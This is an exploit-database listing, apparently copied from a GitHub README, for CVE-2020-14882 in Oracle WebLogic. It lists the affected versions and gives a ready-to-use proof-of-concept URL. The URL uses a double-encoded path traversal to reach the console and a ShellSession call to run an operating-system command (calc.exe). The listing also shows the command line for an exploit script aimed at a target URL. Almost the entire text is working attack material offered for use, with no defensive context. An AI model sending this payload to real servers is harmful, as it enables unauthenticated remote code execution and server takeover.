Sploitus

Exploit for CVE-2020-14882

githubexploit Β· 2020-10-29

Exploit Code

README21 lines
## https://sploitus.com/exploit?id=DAF7B187-3A0C-543D-BE33-E65468E5890A
# CVE-2020-14882

## ε—ε½±ε“ηš„η‰ˆζœ¬οΌš 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

## POC:
```
http://IP:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");
```
## image:
![](https://github.com/wsfengfan/cve-2020-14882/blob/main/weblogic.12.1.4.0.png)

## EXP:

`python3 CVE-2020-14882.py -u http://XXXXX`

## iamge:
![](https://github.com/wsfengfan/cve-2020-14882/blob/main/exp.png)
![](https://github.com/wsfengfan/cve-2020-14882/blob/main/exp2.png)

https://github.com/jas502n/CVE-2020-14882